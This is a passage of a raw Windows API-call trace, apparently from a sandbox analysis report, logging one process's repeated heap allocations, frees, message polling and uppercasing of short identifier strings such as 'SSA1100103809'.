0x2a71aa8 [0218.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0218.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0218.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0218.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0218.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0218.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0218.509] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0218.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0218.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0218.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0218.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0218.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0218.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0218.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0218.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0218.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0218.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0218.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0218.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.510] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0218.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0218.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0218.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0218.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0218.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.511] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0218.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0218.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0218.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0218.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0218.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.512] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0218.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0218.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0218.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0218.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.512] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0218.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0218.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0218.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0218.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0218.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.513] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0218.513] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0218.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0218.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab548 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0218.513] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0218.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0218.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0218.514] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0218.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0218.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0218.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0218.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0218.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0218.514] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0218.514] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0218.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0218.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0218.514] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0218.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab758 [0218.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74088 [0218.514] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0218.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0218.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0218.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0218.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0218.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0218.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0218.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0218.515] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0218.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0218.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0218.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0218.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0218.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0218.515] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0218.515] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0218.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0218.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0218.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0218.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0218.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0218.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0218.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0218.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0218.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0218.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74088 | out: hHeap=0x2af0000) returned 1 [0218.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0218.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0218.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0218.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0218.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0218.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0218.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0218.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0218.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0218.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0218.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0218.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0218.516] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0218.516] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0218.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0218.516] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0218.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0218.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab968 [0218.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74700 [0218.517] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0218.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0218.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0218.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0218.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0218.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0218.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0218.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0218.517] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0218.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0218.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0218.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0218.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0218.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0218.517] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0218.517] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0218.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0218.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0218.518] RtlAllocateHeap (HeapHandle=0x2af0000, 